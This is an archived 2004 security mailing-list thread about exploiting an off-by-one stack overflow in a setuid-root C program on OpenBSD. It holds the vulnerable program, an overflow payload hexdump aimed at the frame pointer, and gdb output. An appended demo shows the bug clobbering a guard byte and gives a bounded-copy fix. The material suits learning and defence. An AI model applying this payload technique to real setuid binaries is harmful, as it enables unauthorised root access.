Message-ID: <F21C7C637A79E84783A75AE36EAFE3DE02F30571@zbnalpex002.na.webmd.net>
From: Jason.Deckard at webmd.net (Deckard, Jason)
Subject: exploiting off by one
Hi Joe,
I don't think the value in ebp is being used by main's caller. As you know,
the calling convention requires the called procedure to preserve the state
of ebp, but that is no guarantee that the caller will use ebp to restore
esp.
Looking at a disassembled version of your code, I can see gcc (version 3.2.3
here) reclaims the parts of the stack used by parameters by increasing esp
with a constant value. For example:
lea 0xffffff78(%ebp),%eax
push %eax
call 80482c8
add $0x8,%esp
I suspect something similar is being done by main's caller. My apologies if
I'm missing something obvious here.
Regards,
Jason Deckard
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joe Hickory
Sent: Thursday, April 15, 2004 2:26 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] exploiting off by one
hi fd,
i'm trying to exploit some overflows to see how it works. i can exploit a
"normal" stack overflow without problem, but now i'm
trying to exploit an off by one overflow and have some questions, first see
what i did:
vulnerable program:
#include <stdio.h>
#include <string.h>   /* strlen */
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 128
int main(int argc, char **argv) {
char buffer[BUFSIZE];
int i, bufsiz;
uid_t userid;
bufsiz = BUFSIZE;
userid = geteuid();
setuid(userid);
printf("userid: %i \n", userid);
printf("buffsize: %i \n", sizeof(buffer));
printf("buffsize: %i \n", bufsiz);
for(i=0;i<=sizeof(buffer);i++) { /* <= is the intended off-by-one: also writes buffer[BUFSIZE] */
buffer[i] = argv[1][i];
}
printf("buffsize: %i \n", strlen(buffer));
printf("buffer: %s\n", buffer);
return 0;
}
$ ls -l
-rwsr-xr-x 1 root wheel 7788 Apr 14 23:43 offbyone
STARTING EGGSHELL:
$ ./eggframeshell 134 68 1100
$EGG at: 0xcfbfd634
last_byte: 44
OVERFLOW BUFFER:
$ echo -n $IJV | hexdump -v
0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
0000070 d634 cfbf d634 cfbf d634 4444 4444 4444
0000080 4444 cfbf
0000084
$ gdb ./offbyone
GNU gdb 4.16.1
Copyright 1996 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-openbsd3.5"...
(gdb) break 21
warning: gdb ignores `const' qualifiers.
Breakpoint 1 at 0x667: file offbyone.c, line 21.
(gdb) run $IJV
Starting program: /./offbyone $IJV
userid: 1000
buffsize: 128
buffsize: 128
Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21
21 printf("buffsize: %i \n", strlen(buffer));
(gdb) info frame
Stack level 0, frame at 0xcfbfd1c0:
eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1
called by frame at 0xcfbfd144
source language c.
Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220
Locals at 0xcfbfd1c0, Previous frame's sp is 0x0
Saved registers:
ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4
(gdb) x/100x $esp
0xcfbfd118: 0xcfbfd368 0xcfbfd220 0x00000001 0x00000000
0xcfbfd128: 0x00000000 0xcfbfd17c 0x48f31671 0x000003e8
0xcfbfd138: 0x00000080 0x00000081 0xcfbfd634 0xcfbfd634
0xcfbfd148: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd158: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd168: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd178: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd188: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd198: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd1a8: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
0xcfbfd1b8: 0x4444d634 0x44444444 0xcfbfd144 0x000004b1
0xcfbfd1c8: 0x00000002 0xcfbfd220 0xcfbfd22c 0xcfbfd368
0xcfbfd1d8: 0xcfbfd1fc 0x00000385 0x0000049f 0x00000000
0xcfbfd1e8: 0xcfbfd21c 0x00001000 0x48f2e000 0x00000000
0xcfbfd1f8: 0x00000410 0xcfbfd21c 0x00000427 0x00000002
0xcfbfd208: 0xcfbfd220 0xcfbfd22c 0x00000000 0xcfbfdff0
0xcfbfd218: 0x00000000 0x00000002 0xcfbfd368 0xcfbfd374
0xcfbfd228: 0x00000000 0xcfbfd3f9 0xcfbfd424 0xcfbfd495
0xcfbfd238: 0xcfbfd4a3 0xcfbfd4b1 0xcfbfd4c9 0xcfbfd4dd
0xcfbfd248: 0xcfbfd4f4 0xcfbfd519 0xcfbfd536 0xcfbfd5bf
0xcfbfd258: 0xcfbfd5ca 0xcfbfd5dd 0xcfbfdddd 0x00000000
0xcfbfd268: 0x00000003 0x00000034 0x00000004 0x00000020
0xcfbfd278: 0x00000005 0x00000006 0x00000006 0x00001000
0xcfbfd288: 0x00000007 0x48f2e000 0x00000008 0x00000000
0xcfbfd298: 0x00000009 0x00000410 0x00000000 0x00000000
(gdb)
(gdb) x/x 0xcfbfd634
0xcfbfd634: 0x90909090
$ ./offbyone $IJV
userid: 0
buffsize: 128
buffsize: 128
buffsize: 134
buffer:
4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???
4???4???4???4???4???4???4???4???4???4???4???4?DDDDDDD????
$
hope it's enough information. just my question is: i manipulated the least
significant byte of the frame pointer, pointing into my
buffer. there in my buffer is the address of my shellcode as the manipulated
return address. but the program is not segfaulting, if
the pointer points to $somewhere. it always exits normally, without opening
a root shell to me.
i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti overflow
protection disabled, "normal" overflow works well)
hope anybody can enlighten me.
joe
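The loop in the quoted program is the whole bug: `i <= sizeof(buffer)` runs 129 iterations over a 128-byte buffer, so the last store lands on whatever the compiler placed directly after buffer[] (in the gdb dump above, the low byte of the saved ebp at 0xcfbfd1c0). The following C program is an added example, not code from the thread: it puts a guard byte right after a 128-byte buffer, runs the post's loop unchanged over a constructed 134-byte input to show the guard gets clobbered, and then runs a bounded strlcpy-style replacement (`bounded_copy`, an assumed helper name) that cannot reach the guard, always NUL-terminates, and reports truncation to the caller.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 128
#define GUARD_VALUE 0xAA
#define INPUT_LEN 134   /* constructed input, same length as the post's $IJV payload */

/* Buffer followed by one guard byte; the guard stands in for whatever the
 * compiler placed right after buffer[] (in the post's frame, the saved ebp). */
struct guarded {
    char buffer[BUFSIZE];
    unsigned char guard;
};

/* The post's loop, unchanged: `<=` runs one iteration too many and stores to
 * dst[bufsize]. dst points at the whole struct, so that store hits the guard. */
static void vulnerable_copy(unsigned char *dst, size_t bufsize, const char *src)
{
    size_t i;
    for (i = 0; i <= bufsize; i++)
        dst[i] = (unsigned char)src[i];
}

/* Hardened replacement (assumed helper, strlcpy-style): writes at most dstsize
 * bytes, always NUL-terminates, and returns strlen(src) so the caller can
 * detect truncation by comparing the result against dstsize. */
static size_t bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t srclen = strlen(src);
    size_t n;
    if (dstsize == 0)
        return srclen;
    n = (srclen < dstsize - 1) ? srclen : dstsize - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen;
}

/* Constructed input: INPUT_LEN bytes of 'A', NUL-terminated. */
static void make_input(char *out)
{
    memset(out, 'A', INPUT_LEN);
    out[INPUT_LEN] = '\0';
}

/* Guard byte after the vulnerable loop. 'A' (0x41) means the byte just past
 * the buffer was overwritten by caller-controlled input. */
int demo_vulnerable_guard(void)
{
    struct guarded f;
    char input[INPUT_LEN + 1];
    make_input(input);
    f.guard = GUARD_VALUE;
    vulnerable_copy((unsigned char *)&f, sizeof f.buffer, input);
    return f.guard;
}

/* Guard byte after the bounded copy: stays GUARD_VALUE. */
int demo_hardened_guard(void)
{
    struct guarded f;
    char input[INPUT_LEN + 1];
    make_input(input);
    f.guard = GUARD_VALUE;
    bounded_copy(f.buffer, sizeof f.buffer, input);
    return f.guard;
}

/* 1 if the bounded copy reported truncation (return value >= dstsize) and
 * left a NUL-terminated string of BUFSIZE - 1 characters, 0 otherwise. */
int demo_hardened_truncated(void)
{
    struct guarded f;
    char input[INPUT_LEN + 1];
    size_t full;
    make_input(input);
    full = bounded_copy(f.buffer, sizeof f.buffer, input);
    return full >= sizeof f.buffer && strlen(f.buffer) == BUFSIZE - 1;
}

int main(void)
{
    printf("guard after vulnerable loop: 0x%02x (expect 0x41)\n", demo_vulnerable_guard());
    printf("guard after bounded copy:    0x%02x (expect 0x%02x)\n", demo_hardened_guard(), GUARD_VALUE);
    printf("truncation detected:         %d\n", demo_hardened_truncated());
    return 0;
}
```

The guard byte is the same idea a stack protector uses: a known value after the buffer whose corruption reveals the overflow before the saved frame pointer or return address is trusted. On OpenBSD, the platform in the quoted post, `strlcpy(3)` already provides the `bounded_copy` semantics, so the real fix is `strlcpy(buffer, argv[1], sizeof buffer)` plus a check of its return value against `sizeof buffer`.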